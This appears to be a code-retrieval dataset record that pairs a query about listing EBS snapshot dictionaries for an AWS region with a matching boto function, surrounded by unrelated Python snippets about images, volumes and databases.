name_and_index = self.name_and_box_index[index]\n #name_and_index needs to be alist of lists\n if(len(name_and_index) >0 and type(name_and_index[0]) is not list): \n name_and_index = [name_and_index] \n \n image_target_list = []\n\n for image_name,box_index in name_and_index:\n #build the path to the image and annotation file\n #see format tab on Get Data page on AVD dataset website\n if image_name[0] == '0':\n scene_type = 'Home'\n else:\n scene_type = 'Office'\n scene_name = scene_type + \"_\" + image_name[1:4] + \"_\" + image_name[4]\n \n #read the image and bounding boxes for this image\n #(doesn't get the movement pointers) \n img = (Image.open(os.path.join(self.root,scene_name, \n images_dir,image_name)))\n with open(os.path.join(self.root,scene_name,annotation_filename)) as f:\n annotations = json.load(f)\n target = annotations[image_name]['bounding_boxes'] \n \n #apply target transform\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n #get the single box\n target = target[box_index]\n\n #crop images for classification if flag is set\n if self.classification:\n img = np.asarray(img)\n img = img[target[1]:target[3],target[0]:target[2],:]\n img = Image.fromarray(img)\n target = target[4] \n \n \n #apply image transform \n if self.transform is not None:\n img = self.transform(img)\n\n image_target_list.append([img,target])\n\n #special case for single image/label\n if(len(image_target_list) == 1):\n image_target_list = image_target_list[0]\n\n return image_target_list", "def get_image_urls(db_conn):\n rows = []\n\n with db_conn.cursor() as cur:\n cur.execute(\"select image_url from image_urls;\")\n for row in cur:\n print(row)\n rows.append({\n \"image_url\": row[0]\n })\n\n db_conn.commit()\n\n return rows", "def get_all_images(access_token):\n url = 'http://interview.agileengine.com/images'\n headers = {\n 'Authorization': 'Bearer ' + access_token\n }\n images = []\n try:\n logging.info(\"Fetching all the images\")\n response = requests.get(\n url,\n headers=headers\n )\n if response.ok: \n total_pages = response.json().get('pageCount')\n images = response.json().get('pictures')\n logging.info(f\"fetched 1 of {total_pages}\")\n for i in range(2,total_pages + 1):\n paginated_url = f'http://interview.agileengine.com/images?page={i}'\n response = requests.get(\n paginated_url,\n headers=headers\n )\n images += response.json().get('pictures')\n logging.info(f\"fetched {i} of {total_pages}\")\n \n detailed_images = []\n for image in images:\n detail_url = f\"http://interview.agileengine.com/images/{image.get('id')}\"\n \n logging.info(f\"Retrieving detail of {image['id']}\")\n response = requests.get(\n detail_url,\n headers=headers\n )\n if response.ok:\n detailed_images.append(response.json())\n return detailed_images\n except requests.exceptions.HTTPError:\n logging.exception('HTTP error')\n except requests.exceptions.ConnectionError:\n logging.exception('Connection error')\n except requests.exceptions.Timeout:\n logging.exception('Timeout error')\n except requests.exceptions.RequestException as e:\n logging.exception('Unexpected error')", "def index(self, req):\n params = {\n 'filters': self._get_filters(req),\n 'limit': self._get_limit(req),\n }\n\n if 'marker' in req.str_params:\n params['marker'] = self._get_marker(req)\n\n images = db_api.image_get_all_public(None, **params)\n\n results = []\n for image in images:\n result = {}\n for field in DISPLAY_FIELDS_IN_INDEX:\n result[field] = image[field]\n results.append(result)\n return dict(images=results)", "def image_display(start, end, user=None):\n if user != None:\n images = Image.objects.filter(submitter_id = user.id).order_by('-submission_date')[start:end]\n else:\n images = Image.objects.order_by('-submission_date')[start:end]\n rows = {}\n #Initialise lists\n for i in xrange(int(math.ceil(len(images)/3.0))): rows[i] = []\n #applies the lambda function to put each element into it's correct row\n map((lambda (idx, elem): rows[idx/3].append(elem)), enumerate(images))\n return rows", "def get_image_links(data):\n painting_links = []\n\n print(data)\n\n for painting in data:\n painting_links.append(painting['image'])\n\n return painting_links", "def get_images(self, ctx, page):\n is_imgur = 'source' in page.meta and page.meta['source'] == 'imgur'\n if 'type' in page.meta and page.meta['type'] == 'album':\n album = page.meta\n images = []\n if is_imgur:\n pp.pprint(page.meta)\n # bind to template via json\n images = self.get_imgur_album_images(page)\n self.albums[album['slug']] = images\n else:\n # get paths of all of the images in the album\n srcs = []\n # get absolute paths of images in album for each file type\n for file_type in FILE_TYPES:\n imgs = glob.glob(\n GALLERY_DIR + album['slug'] + '/*.' + file_type\n )\n\n for img in imgs:\n img_rel_path = (\n REL_GALLERY_DIR +\n album['slug'] + '/' + img.split('/')[-1]\n )\n srcs.append(img_rel_path)\n\n # split full srcs and thumb srcs from srcs into two lists\n images = []\n thumb_srcs = filter(\n lambda src: src.split('/')[-1].startswith(THUMB_PREFIX),\n srcs\n )\n for thumb_src in thumb_srcs:\n src = thumb_src.replace(THUMB_PREFIX, '')\n thumb_width, thumb_height = self.calc_img_hw(thumb_src)\n width, height = self.calc_img_hw(src)\n images.append({\n 'thumb_src': thumb_src,\n 'thumb_width': thumb_width,\n 'thumb_height': thumb_height,\n\n 'src': src,\n 'width': width,\n 'height': height,\n })\n self.albums[album['slug']] = images", "def make_image_dict(self):\n sprite_sheet = setup.GFX['treasurechest']\n image_dict = {'closed': self.get_image(0, 0, 32, 32, sprite_sheet),\n 'opened': self.get_image(32, 0, 32, 32, sprite_sheet)}\n\n return image_dict", "def index(self, req):\n context = req.environ['nova.context']\n filters = self._get_filters(req)\n images = self._image_service.index(context, filters=filters)\n images = common.limited(images, req)\n builder = self.get_builder(req).build\n return dict(images=[builder(image, detail=False) for image in images])", "def img_urls(self, media, type = \"low_resolution\"):\n\n imgs = {}\n\n for item in media:\n if item[\"type\"] != \"image\":\n continue\n\n imgs[item[\"id\"]] = item[\"images\"][type][\"url\"]\n\n return imgs", "def getOverlapComparisonImagesDict(self) :\n overlap_shift_comparisons = {}\n for o in self.overlaps :\n overlap_shift_comparisons[o.getShiftComparisonDetailTuple()]=o.getShiftComparisonImages()\n return overlap_shift_comparisons", "def default_image_list(self):\n for version in self.database.versions:\n release = self.database.latest_release(\n default.platform, version=version, architecture=default.architecture\n )\n\n if not release:\n continue\n\n image = self.database.get(\n version=version,\n platform=default.platform,\n release=release,\n architecture=default.architecture,\n )\n\n if not image:\n continue\n\n tags = [\n tag\n for tag in self.database.tags(image)\n if not any(\n (len(tag.version) == 4, tag.platform, tag.release, tag.architecture)\n )\n ]\n\n yield _format_image(image, tags)", "def filter_images(data, vgid2idx, meta_vgids):\r\n new_data = []\r\n for vgid in meta_vgids:\r\n new_data.append(data[vgid2idx[vgid]])\r\n return new_data", "def images(self, **kwargs):\n\n raise NotImplementedError", "def load_test_images(images):\n loaded = {}\n for description, _ in images.items():\n loaded[description] = load_from_netcdf(description)\n return loaded", "def read_image_data(self):\n\n for sequence_name in self.sequence_name_list:\n sequence = self.sequences[sequence_name]\n for image_id in sequence.image_id_list:\n sequence.image_dict[image_id].image_path = '{}{}/{}'.format(self.root_dir, self.name, sequence.image_dict[image_id].filename)", "def data_dict0():\n\n # 0- Sample from detectron2 -> 5 different sections.\n info_val0 = [{\"date_created\": \"2020-03-15 04:59:45.442988\",\n \"description\": \"Automatically generated COCO json file for Detectron2.\"}]\n images0 = [{\"id\": \"image\", \"width\": 100,\n \"height\": 100, \"file_name\": \"image.png\"}]\n annotations0 = [{\"id\": 1, \"image_id\": \"image\", \"bbox\": [70.0, 30.0, 30.0, 40.0],\n \"area\": 1200.0, \"iscrowd\": 0, \"category_id\": 0}]\n categories0 = [{\"id\": 0, \"name\": \"first\"}]\n licence0 = 'null'\n\n return [{\"info\": info_val0,\n \"images\": images0,\n \"annotations\": annotations0,\n \"categories\": categories0,\n \"licenses\": licence0}]", "def imageItems(self, context):\n prefs = getPreferences()\n\n images = [('NONE', \"––– Select –––\", \"\")]\n if prefs.path_value:\n for img in environmentImages(prefs.path_value):\n images.append((img, img, \"\"))\n\n return images", "def imageList(self):\n return self.__imageList", "def get_plates(cls, img_objs):\n # Make a copy of incoming image objects\n # Place holder for plate information\n img_objs['plate-detection'] = {}\n\n for original_image, crop_image in img_objs['cropped-images'].items():\n if crop_image != 0:\n\n # Obtain response from API\n information = cls.get_response(crop_image)\n\n if len(information) > 0:\n\n plate, prob, box = information[0], information[1], information[2]\n\n detection = {'path': crop_image,\n 'plate': plate,\n 'box': box,\n 'prob': prob\n }\n\n img_objs['plate-detection'][original_image] = detection\n else:\n\n print(' NO PLATES IN IMAGE {}'.format(crop_image))\n detection = {'path': crop_image,\n 'plate': 'NOPLATE',\n 'box': 0,\n 'prob': 0\n }\n img_objs['plate-detection'][original_image] = detection\n else:\n detection = {'path': original_image,\n 'plate': 'NOPLATE',\n 'box': 0,\n 'prob': 0\n }\n img_objs['plate-detection'][original_image] = detection\n\n return img_objs", "def get_images(self):\n \n images = []\n for order in self.order_lst:\n o_items = order.get_items()\n images.append(o_items.get_image())\n \n return images", "def get_image_urls_and_crop_metadatas(capture_keys):\n\n left_urls, crop_metadatas = [], []\n for capture_key in capture_keys:\n print(capture_key)\n\n # get image URLs\n left_image_key = capture_key.replace('capture.json', 'left_frame.resize_512_512.jpg')\n left_image_url = os.path.join('s3://', INBOUND_BUCKET, left_image_key)\n left_urls.append(left_image_url)\n\n # get crop metadata\n crop_key = capture_key.replace('capture.json', 'crops.json')\n\n try:\n s3.download_from_s3(INBOUND_BUCKET, crop_key, custom_location='/root/data/crops.json')\n crop_metadata = json.load(open('/root/data/crops.json'))\n\n anns = crop_metadata['annotations']\n if anns:\n left_image_anns = [ann for ann in anns if ann['image_id'] == 1]\n crop_metadatas.append(left_image_anns)\n else:\n crop_metadatas.append([])\n except ClientError as err:\n crop_metadatas.append([])\n\n return left_urls, crop_metadatas", "def iiif_info_json(images):\n return json.dumps([image[\"image\"].info() for image in images])", "def get_images(self):\n return self._get_brains(\"Image\")", "def list_images():\n image_map = build_image_map()\n click.echo('')\n click.echo('List of available images (Name - Description)')\n click.echo('')\n for name in image_map:\n click.echo('{} -> {}'.format(name, image_map[name]))", "def get_car_images(request):\n \n try:\n parsed_data = get_json_data(request)\n car = Car.objects.get(car_id=parsed_data[\"car_id\"])\n images = CarImage.objects.filter(car=car)\n image_path = []\n for image in images:\n image_path.append(ImageSerializer(image).serialize())\n ret = Response(SUCCESS, error_code[SUCCESS])\n ret.set_ret(\"data\", image_path)\n except ObjectDoesNotExist as e:\n ret = Response(NONEXIST_DATA, error_code[NONEXIST_DATA].format(e.message))\n except ValueError as e:\n ret = Response(INPUT_FORMAT, error_code[INPUT_FORMAT])\n except:\n ret = Response(UNKNOWN_ERROR, error_code[UNKNOWN_ERROR])\n return HttpResponse(ret.serialize(f))", "def clean(imagedata):\n\n if isinstance(imagedata, ndarray):\n imagedata = [imagedata]\n\n outdict = [array_to_im(im) for im in imagedata]\n\n return {'images': outdict}", "def get_image(self, pvname):\n if self.protocol == \"ca\":\n pvname = pvname.replace(\":ArrayData_RBV\", \"\")\n nx = self.get(f\"{pvname}:ArraySizeX_RBV\")\n ny = self.get(f\"{pvname}:ArraySizeY_RBV\")\n dw = self.get(f\"{pvname}:dw\")\n dh = self.get(f\"{pvname}:dh\")\n image = self.get(f\"{pvname}:ArrayData_RBV\")\n image = image.reshape(int(nx), int(ny))\n\n elif self.protocol == \"pva\":\n # context returns np array with WRITEABLE=False\n # copy to manipulate array below\n output = self.get(pvname)\n attrib = output.attrib\n dw = attrib[\"dw\"]\n dh = attrib[\"dh\"]\n nx, ny = output.shape\n image = copy.copy(output)\n\n return {\n \"image\": [image],\n \"x\": [-dw / 2],\n \"y\": [-dh / 2],\n \"dw\": [dw],\n \"dh\": [dh],\n }", "def read_images_file(deployment_path):\n image_data = []\n\n if os.path.isfile(os.path.join(deployment_path, images_filename)):\n with open(os.path.join(deployment_path, images_filename), 'rb') as csvfile:\n images_reader = csv.reader(x.replace('\\0', '') for x in csvfile)\n\n row_index = 2\n #skip the header rows (2)\n images_reader.next()\n images_reader.next()\n\n for row in images_reader:\n row_index = row_index + 1\n image_data_instance = dict(date_time=row[0],\n latitude=row[1],\n longitude=row[2],\n depth=row[3],\n image_name=row[4],\n camera_name=row[5],\n camera_angle=row[6],\n temperature=row[7],\n salinity=row[8],\n pitch=row[9],\n roll=row[10],\n yaw=row[11],\n altitude=row[12],\n depth_uncertainty=row[13])\n image_data.append(image_data_instance)\n else:\n print \"ERROR: Could not find images.csv file.\"\n\n return image_data", "def images(self, details=True, **query):\n img = _image.ImageDetail if details else _image.Image\n return list(self._list(img, paginated=True, **query))", "def image_list(self):\n return self._image_list", "def getVolumesD(region):\n volumes = getVolumes(region)\n instances = getInstancesD(region)\n\n volumesDicts = []\n for v in volumesDicts:\n volumesDict = {\"id\": v.id,\n \"KEEP-tag\": getKeepTag(v),\n \"instance_KEEP-tag\": getKeepTag(getInstanceOf(v)),\n \"instance\": v.attach_data.instance_id,\n \"status\": v.status,\n \"size\": v.size,\n \"create-time\": v.create_time,\n \"region\": v.region.name,\n \"zone\": v.zone,\n \"snapshot_id\": v.snapshot_id,\n \"PROD\": isProduction(v)\n }" ]
[ "0.74375165", "0.669343", "0.6320971", "0.6303299", "0.6287237", "0.6220304", "0.6202331", "0.6175909", "0.60951483", "0.6012867", "0.60106635", "0.59991914", "0.59578496", "0.5940436", "0.5936577", "0.5930096", "0.5909181", "0.5908506", "0.5903435", "0.58975405", "0.5881977", "0.58542645", "0.5824696", "0.5811506", "0.58090603", "0.5804399", "0.5748864", "0.5746013", "0.5739648", "0.57352364", "0.5729914", "0.57246083", "0.57130903", "0.57122064", "0.5712117", "0.5683218", "0.56760406", "0.5664283", "0.565954", "0.56428885", "0.5638608", "0.56307554", "0.5590077", "0.55819523", "0.55762935", "0.5567631", "0.5560035", "0.5530086", "0.55282646", "0.5528015", "0.5516502", "0.55022424", "0.54983443", "0.54899776", "0.5483382", "0.5431314", "0.54280454", "0.542632", "0.5414893", "0.5412504", "0.54099536", "0.5405128", "0.5402845", "0.5402427", "0.54020274", "0.5398716", "0.539489", "0.53826135", "0.5381654", "0.5376785", "0.53668463", "0.53564405", "0.535516", "0.5350805", "0.5345547", "0.53408206", "0.53385067", "0.53366506", "0.5329785", "0.53268486", "0.5323601", "0.5322896", "0.53179944", "0.5315089", "0.53125554", "0.53119045", "0.5311775", "0.531059", "0.5309604", "0.5309284", "0.5305756", "0.5304368", "0.5296124", "0.5291739", "0.5286412", "0.5285465", "0.5281235", "0.528092", "0.5278431", "0.52760303" ]
0.7583085
0
return a list of dictionaries representing snapshots from one region
def getSnapshotsD(region): # Can a snapshot belong to more than one AMI? Dunno, keep list just in case (so it never breaks due to it) snapshots = getSnapshots(region) snapshotsDicts = [] ims = getImages(region) for s in snapshots: amis = getAmisOf(s, ims) amiIds = [] amiKeeps = [] if len(amis) == 1: amiIds = amis[0].id.encode() amiKeeps = getKeepTag(amis[0]) elif len(amis) == 0: amiIds = "-------no-AMI-found" amiKeeps = "-------no-AMI-found" else: for a in amis: amiIds.append(a.id.encode()) amiKeeps.append(getKeepTag(a)) snapshotsDict = {"id": s.id, "status": s.status, "region": s.region.name, "progress": s.progress, "start_time": s.start_time, "volume_id": s.volume_id, "volume_size": s.volume_size, "KEEP-tag": getKeepTag(s), "Name": get_name_tag(s), "AMI(s)": amiIds, "AMI_KEEP-tags": amiKeeps, "PROD": isProduction(s), "Description": s.description } snapshotsDicts.append(snapshotsDict) return snapshotsDicts
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_snapshots(self, region):\n try:\n conn = ec2.connect_to_region(region, **self.credentials)\n region_snapshots = conn.get_all_snapshots(owner='self')\n except boto.exception.EC2ResponseError:\n return []\n return region_snapshots", "def items(self):\n if self.__has_contents:\n return [dict(zip(['id', 'description', 'size', 'start_time', 'state'],\n [item['SnapshotId'], item['Description'], item['VolumeSize'],\n item['StartTime'], item['State']]))\n for item in self.__response['Snapshots']]\n else:\n return []", "def _list_snapshots(self):\n return self.resource.describe_snapshots(\n Filters=[\n {\n 'Name': 'tag:CreatedBy',\n 'Values': [\n 'AutomatedBackup{}'.format(INTERVAL_TYPE.capitalize())\n ]\n }\n ]\n )", "def getImagesD(region):\n images = getImages(region)\n imageDicts = []\n for im in images:\n imageDict = {\"name\": im.name,\n \"id\": im.id,\n \"region\": im.region.name,\n \"state\": im.state,\n \"created\": im.creationDate,\n \"type\": im.type,\n \"KEEP\": getKeepTag(im),\n \"name_tag\": get_name_tag(im),\n \"snapshots\": getSnapshotsOf(im),\n \"description\": im.description,\n \"PROD\": isProduction(im)\n }\n imageDicts.append(imageDict)\n return imageDicts", "def get_snapshots(self):\n _url = f\"{self.connector.base_url}/projects/{self.project_id}/snapshots\"\n\n response = self.connector.http_call(\"get\", _url)\n self.snapshots = response.json()", "def get_snapshots(self) -> SnapshotListing:\n return self.snapshots", "def vm_snapshotlist(args):\n snapshot = args.snapshot\n name = args.name\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n common.pprint(\"Listing snapshots of %s...\" % name)\n snapshots = k.snapshot(snapshot, name, listing=True)\n if isinstance(snapshots, dict):\n common.pprint(\"Vm %s not found\" % name, color='red')\n return\n else:\n for snapshot in snapshots:\n print(snapshot)\n return", "def get_snapshots(self):\r\n ec2 = self.get_ec2_connection()\r\n rs = ec2.get_all_snapshots()\r\n all_vols = [self.volume_id] + self.past_volume_ids\r\n snaps = []\r\n for snapshot in rs:\r\n if snapshot.volume_id in all_vols:\r\n if snapshot.progress == '100%':\r\n snapshot.date = dateutil.parser.parse(snapshot.start_time)\r\n snapshot.keep = True\r\n snaps.append(snapshot)\r\n snaps.sort(cmp=lambda x,y: cmp(x.date, y.date))\r\n return snaps", "def generateInfoSnapshots(regions):\n print \"Writing snapshots info to output file %s\" % snapshots_data_output_file\n snapshots = []\n for r in regions:\n snapshots += getSnapshotsD(r)\n print \".\" # feedback for the user\n with open(snapshots_data_output_file, 'w') as f2:\n f2.write(\"SNAPSHOTS\\n\")\n f2.write(\n \"Name\\tsnapshot_id\\tKEEP-tag_of_snapshot\\tKEEP-tag_of_AMI\\tproduction?\\tassociated_AMI\\tstart_time\\tstatus\"\n \"\\tregion\\tprogress\\tassociated_volume\\tvolume_size\\tdescription\\n\\n\")\n for s in snapshots:\n f2.write(\"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n\"\n % (s['Name'], s['id'], s['KEEP-tag'], s['AMI_KEEP-tags'], s['PROD'], s['AMI(s)'], s['start_time'],\n s['status'], s['region'], s['progress'], s['volume_id'], s['volume_size'], s['Description']))", "def snapshots_created(self):\n # log.debug(\"Getting snaps created for volume {0}\".format(self.volume_id))\n snaps_info = []\n for snap in self._derived_snapshots:\n snap_info = {}\n try:\n if snap.volume_id == self.volume_id:\n snap.update()\n snap_info['snap_id'] = snap.id\n snap_info['snap_progress'] = snap.progress\n snap_info['snap_status'] = snap.status\n snap_info['snap_desc'] = snap.description\n snaps_info.append(snap_info)\n except EC2ResponseError, e:\n log.warning(\"EC2ResponseError getting snapshot status: {0} \"\n \"(code {1}; status {2})\"\n .format(e.message, e.error_code, e.status))\n return snaps_info", "def list_snapshots(args):\n html_doc = document.Document(get_code(args.file))\n edition, region, snapshots = html_doc.list(date=args.edition, region=args.region)\n print('Snapshots for {:s} {:%B %d, %Y}'.format(region.capitalize(), edition))\n for i in range(len(snapshots)):\n print('({:2d}) {!r:} -'.format(i, snapshots[i][1]) +\n ' {0:%B} {0.day:2}, {0:%Y %l:%M:%S.%f %p}'.format(snapshots[i][0]))", "def getSnapshots(self):\n snapshots = []\n for x in self.root.goto('CommonDataObjects/Attachments'):\n for y in x.getList():\n if y['name'] == 'Video Snapshot':\n self.f.seek(y['bidx'])\n blk = Block(self.f)\n sx = blk.goto('res_x').getLong()\n sy = blk.goto('res_y').getLong()\n raw = blk.goto(\"imagedata\").value\n data = zlib.decompress(raw)\n I = np.flipud(np.array(struct.unpack(\"<\" + str(3 * sx * sy) + \"B\", data)).reshape((sy, sx, 3)))\n snapshots.append(I)\n del blk\n return snapshots", "def populate_snapshots(self):\n print \"Populating snapshots info...\"\n snapshots = self.get_all_snapshots()\n\n for i in snapshots:\n\n # find the ami id(s) for this snapshot. API allows for multiple even though I don't think there would be\n associated_ami_ids = self.get_amis_of(i.id)\n\n ami_keep_tags = [Ims.spreadsheet[ami_id]['KEEP_tag'] for ami_id in associated_ami_ids]\n\n self.spreadsheet[i.id] = dict(Name_tag=self.get_name_tag(i), id=i.id, KEEP_tag=self.get_keep_tag(i),\n ami_KEEP_tag=ami_keep_tags, associated_ami_ids=associated_ami_ids,\n PROD_tag=self.is_production(i), start_time=i.start_time,\n region=i.region.name, associated_volume=i.volume_id,\n volume_size=i.volume_size, description=i.description)", "def get_snapshots_of(image):\n snapshot_ids = []\n device_mapping = image.block_device_mapping # dict of devices\n devices = device_mapping.keys()\n for device in devices:\n if device_mapping[device].snapshot_id is not None:\n snapshot_ids.append(device_mapping[device].snapshot_id.encode()) # do I need to have 'encode' here?\n return snapshot_ids", "def list_snapshots(project):\n data = {constants.PROJECT_PARAMETER: project}\n res = requests.post(_url + \"list_snapshots/\", data=data,\n auth=(_username, _password))\n if res.status_code == 200:\n snapshots = json.loads(res.content)\n table = PrettyTable(field_names=[\"Snapshot\", \"Parent\"])\n for snapshot in snapshots:\n table.add_row(snapshot)\n click.echo(table.get_string())\n else:\n click.echo(res.content)", "def getContainerSnapshots(self,node,vmid):\n data = self.connect('get','nodes/%s/lxc/%s/snapshot' % (node,vmid),None)\n return data", "def getSnapshotsOf(image):\n snapshotIds = []\n deviceMapping = image.block_device_mapping # dict of devices\n devices = deviceMapping.keys()\n for d in devices:\n snapshotId = deviceMapping[d].snapshot_id\n if snapshotId is not None:\n snapshotIds.append(snapshotId.encode())\n return snapshotIds", "def database_volume_snapshot_get_list():\n db = database_get()\n\n session = db.session()\n query = session.query(model.VolumeSnapshot)\n\n volume_snapshot_objs = list()\n for volume_snapshot in query.all():\n nfvi_volume_snapshot_data = \\\n json.loads(volume_snapshot.nfvi_volume_snapshot_data)\n nfvi_volume_snapshot = nfvi.objects.v1.VolumeSnapshot(\n nfvi_volume_snapshot_data['uuid'],\n nfvi_volume_snapshot_data['name'],\n nfvi_volume_snapshot_data['description'],\n nfvi_volume_snapshot_data['size_gb'],\n nfvi_volume_snapshot_data['volume_uuid'])\n volume_snapshot_obj = objects.VolumeSnapshot(nfvi_volume_snapshot)\n volume_snapshot_objs.append(volume_snapshot_obj)\n return volume_snapshot_objs", "def get_content(self):\r\n content = []\r\n for regiongroup in self.region_groups:\r\n for region in regiongroup.get_content():\r\n # Add date, unique_name and project to the metadata\r\n region[0]['date'] = self.extracted_date\r\n region[0]['unique_name'] = self.unique_name\r\n try:\r\n project = os.path.split(\r\n os.path.split(self.unique_name)[0]\r\n )[1]\r\n except IndexError:\r\n project = ''\r\n region[0]['project'] = project\r\n content.append(region)\r\n return content", "def list_snapshots(self, detail=False, **params):\n url = 'snapshots'\n list_schema = schema.list_snapshots_no_detail\n if detail:\n url += '/detail'\n list_schema = schema.list_snapshots_with_detail\n if params:\n url += '?%s' % urllib.urlencode(params)\n\n resp, body = self.get(url)\n body = json.loads(body)\n self.validate_response(list_schema, resp, body)\n return rest_client.ResponseBody(resp, body)", "def snapshots(self, owner=None, restorable_by=None):\r\n rs = self.connection.get_all_snapshots(owner=owner,\r\n restorable_by=restorable_by)\r\n mine = []\r\n for snap in rs:\r\n if snap.volume_id == self.id:\r\n mine.append(snap)\r\n return mine", "def get_snapshots(dataset=''):\n # filter my tags\n return os.listdir(dataset + ZFS_DEFAULT_SNAPSHOT_DIR)", "def get_snapshots(FIELDS='all'):\n snapinfostr = fork_and_get_output(\"zfs list -t snapshot -H -o {0}\".format(FIELDS).split())\n header = get_zfs_snap_header()\n snapinfo = snapinfostr.splitlines()\n snapobjs = []\n for snapstr in snapinfo:\n snapobjs.append(DataZFS(snapstr, header, 'snapshot'))\n return snapobjs", "def listInstancesRegionZone(region,zone):\n\tprint \"-\"*80\n\tprint \"# Region :\",region,\" Zone\", zone\t\n\tprint \"-\"*80\n\tinstances = getInstancesRegionZone(region,zone)\n\tif instances:\n\t\tfor instance in instances:\n\t\t\tprint \"[\",instance.ami_launch_index,\"]\",instance.ip_address,\" (\",instance.private_ip_address,\") \",instance.instance_type,\" key=\",instance.key_name", "def getVolumesD(region):\n volumes = getVolumes(region)\n instances = getInstancesD(region)\n\n volumesDicts = []\n for v in volumesDicts:\n volumesDict = {\"id\": v.id,\n \"KEEP-tag\": getKeepTag(v),\n \"instance_KEEP-tag\": getKeepTag(getInstanceOf(v)),\n \"instance\": v.attach_data.instance_id,\n \"status\": v.status,\n \"size\": v.size,\n \"create-time\": v.create_time,\n \"region\": v.region.name,\n \"zone\": v.zone,\n \"snapshot_id\": v.snapshot_id,\n \"PROD\": isProduction(v)\n }", "def derived_snapshots(self):\n start_time = time.time()\n log.debug(\"Getting snaps derived from volume {0}.\".format(self.volume_id))\n derived_snapshots = []\n for snap in self.app.cloud_interface.get_all_snapshots():\n try:\n if snap.volume_id == self.volume_id:\n derived_snapshots.append(snap)\n except EC2ResponseError, e:\n log.warning(\"EC2ResponseError getting snapshot status: {0} \"\n \"(code {1}; status {2})\"\n .format(e.message, e.error_code, e.status))\n log.debug(\"Got snaps derived from volume {0} in {1} seconds: {2}\"\n .format(self.volume_id, time.time() - start_time, derived_snapshots))\n return derived_snapshots", "def list(self, detailed=True, search_opts=None, marker=None, limit=None,\n sort=None):\n resource_type = \"snapshots\"\n url = self._build_list_url(resource_type, detailed=detailed,\n search_opts=search_opts, marker=marker,\n limit=limit, sort=sort)\n return self._list(url, resource_type, limit=limit)", "def test_aws_service_api_snapshots_get(self):\n pass", "def perform_snapshot(context, region, installed_region='us-east-1'):\n LOG.info('Reviewing snapshots in region %s', region)\n\n # fetch these, in case we need to figure out what applies to an instance\n configurations = dynamo.list_configurations(context, installed_region)\n LOG.debug('Fetched all possible configuration rules from DynamoDB')\n\n # build a list of any IDs (anywhere) that we should ignore\n ignore_ids = utils.build_ignore_list(configurations)\n\n # setup some lookup tables\n cache_data = utils.build_cache_maps(context, configurations, region, installed_region)\n all_instances = cache_data['instance_id_to_data']\n instance_configs = cache_data['instance_id_to_config']\n volume_snap_recent = cache_data['volume_id_to_most_recent_snapshot_date']\n\n for instance_id in set(all_instances.keys()):\n # before we go do some work\n if timeout_check(context, 'perform_snapshot'):\n break\n\n if instance_id in ignore_ids:\n continue\n\n snapshot_settings = instance_configs[instance_id]\n\n # parse out snapshot settings\n retention, frequency = utils.parse_snapshot_settings(snapshot_settings)\n\n # grab the data about this instance id, if we don't already have it\n instance_data = all_instances[instance_id]\n\n ami_id = instance_data['ImageId']\n LOG.info('Reviewing snapshots in region %s on instance %s', region, instance_id)\n\n for dev in instance_data.get('BlockDeviceMappings', []):\n # before we go make a bunch more API calls\n if timeout_check(context, 'perform_snapshot'):\n break\n\n # we probably should have been using volume keys from one of the\n # caches here, but since we're not, we're going to have to check here too\n LOG.debug('Considering device %s', dev)\n volume_id = dev['Ebs']['VolumeId']\n\n if volume_id in ignore_ids:\n continue\n\n # find snapshots\n recent = volume_snap_recent.get(volume_id)\n now = datetime.datetime.now(dateutil.tz.tzutc())\n\n # snapshot due?\n if should_perform_snapshot(frequency, now, volume_id, recent):\n LOG.debug('Performing snapshot for %s, calculating tags', volume_id)\n else:\n LOG.debug('NOT Performing snapshot for %s', volume_id)\n continue\n\n # perform actual snapshot and create tag: retention + now() as a Y-M-D\n delete_on_dt = now + retention\n delete_on = delete_on_dt.strftime('%Y-%m-%d')\n\n volume_data = utils.get_volume(volume_id, region=region)\n expected_tags = utils.calculate_relevant_tags(\n instance_data.get('Tags', None),\n volume_data.get('Tags', None))\n\n utils.snapshot_and_tag(\n instance_id,\n ami_id,\n volume_id,\n delete_on,\n region,\n additional_tags=expected_tags)", "def list_snapshots(session, verbose):\n # type: (Session, bool) -> Union[List[str], List[Dict[str,str]]]\n if not session.network:\n raise ValueError(\"Network must be set to list snapshots\")\n url_tail = \"/{}/{}/{}\".format(\n CoordConstsV2.RSC_NETWORKS, session.network, CoordConstsV2.RSC_SNAPSHOTS\n )\n return _get_list(session, url_tail, {CoordConstsV2.QP_VERBOSE: verbose})", "def regions_dict(self):\n regions_dict = dict()\n for i, r in enumerate(self.regions):\n regions_dict[getattr(r, 'ix', i)] = r\n return regions_dict", "def get_volume_snapshots(self, volume):\n LOG.debug('get_volume_snapshot starts')\n pool_name = self.configuration.rbd_pool\n volume_name = 'volume-%s' % encodeutils.safe_encode(volume[\"id\"])\n snaps_on_vol = self._get_volume_snapshots(pool_name, volume_name)\n snapshots = list()\n if snaps_on_vol is not None:\n for snap in snaps_on_vol:\n snap_name = str(snap[\"name\"])\n item = dict()\n if snap_name.startswith(\"snapshot-\"):\n # snapshot directly created on volume.\n item[\"type\"] = \"volume_snap\"\n item[\"uuid\"] = snap_name[len('snapshot-'):]\n elif snap_name.startswith(\"volume-\") and \\\n snap_name.endswith(\".clone_snap\"):\n # snapshot used for create volume on volume.\n item[\"type\"] = \"clone_snap\"\n item[\"uuid\"] = snap_name[len(\"volume-\"):-len(\".clone_snap\")]\n elif snap_name.startswith(\"backup.\") and \".snap.\" in snap_name:\n # snapshot used for backup volume.\n item[\"type\"] = \"backup_snap\"\n item[\"uuid\"] = \\\n snap_name[len(\"backup.\"):snap_name.index(\".snap.\")]\n else:\n item[\"type\"] = \"\"\n item[\"uuid\"] = \"\"\n snapshots.append(item)\n\n LOG.debug('volume snapshots: %s', snapshots)\n LOG.debug('get_volume_snapshots finished.')\n return snapshots", "def getStudyRegions():\n comp_name = os.environ['COMPUTERNAME']\n conn = py.connect('Driver=ODBC Driver 11 for SQL Server;SERVER=' +\n comp_name + '\\HAZUSPLUSSRVR; UID=SA;PWD=Gohazusplus_02')\n exclusionRows = ['master', 'tempdb', 'model', 'msdb', 'syHazus', 'CDMS', 'flTmpDB']\n cursor = conn.cursor()\n cursor.execute('SELECT [StateID] FROM [syHazus].[dbo].[syState]') \n for state in cursor:\n exclusionRows.append(state[0])\n cursor = conn.cursor()\n 